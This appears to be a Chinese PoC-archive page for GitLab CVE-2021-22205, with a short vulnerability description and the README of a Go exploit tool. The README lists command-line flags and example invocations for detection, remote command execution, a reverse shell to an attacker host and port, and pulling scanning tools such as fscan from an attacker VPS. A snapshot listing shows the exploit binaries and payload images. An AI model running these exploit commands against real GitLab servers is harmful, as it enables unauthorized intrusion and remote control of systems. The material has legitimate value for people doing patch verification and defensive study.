关联漏洞
标题:
GitLab 代码注入漏洞
(CVE-2021-22205)
描述:GitLab是美国GitLab公司的一个开源的端到端软件开发平台,具有内置的版本控制、问题跟踪、代码审查、CI/CD(持续集成和持续交付)等功能。 Gitlab Community Edition 存在代码注入漏洞,该漏洞源于图像解析器在处理图像文件时输入验证不正确。以下产品及版本受到影响::Gitlab Community Edition: 11.9.0, 11.9.1, 11.9.2, 11.9.3, 11.9.4, 11.9.5, 11.9.6, 11.9.7, 11.9.8, 11.9.9, 11
描述
CVE-2021-22205 RCE
介绍
# CVE-2021-22205
CVE-2021-22205 RCE 工具仅用于分享交流,切勿用于非授权测试,否则与作者无关
```
-R string
VPS to load tools eg: -R 127.0.0.1:8083
-T string
Tool name eg: -T fscan
-c string
exec cmd eg: -c "id" (default "id")
-host string
reverse shell host
-m string
Method for using of CVE-2021-22205 eg:-m detect|rce1|rev|upload (default "detect")
-port string
reverse shell port
-target string
Target Url (eg: -target https://10.10.10.10) (default "https://10.10.10.10")
```
实现四个功能
```
DnsLog探测
-m detect
CVE-2021-22205.exe -target https://10.10.10.10 -m detect
RCE
-m rce1
rce(Postbin-OOB)
CVE-2021-22205.exe -target https://10.10.10.10 -m rce1 -c whoami
反弹shell
-m rev
CVE-2021-22205.exe -target https://10.10.10.10 -m rev -host 10.10.10.10 -p 8081
上传文件(http出网-curl,需要VPS)
-m upload
CVE-2021-22205.exe -target https://10.10.10.10 -m upload -R 127.0.0.1:8083 -T fscan.exe
```
文件快照
[4.0K] /data/pocs/01e8115a4608b3c443dc5b7d59b067d6a6ce8701
├── [6.6M] CVE-2021-22205
├── [6.5M] CVE-2021-22205.exe
├── [ 31] go.mod
├── [7.6K] main.go
├── [ 224] output.jpg
├── [1.0K] README.md
├── [ 796] shell.jpg
└── [312K] timeZone.png
0 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。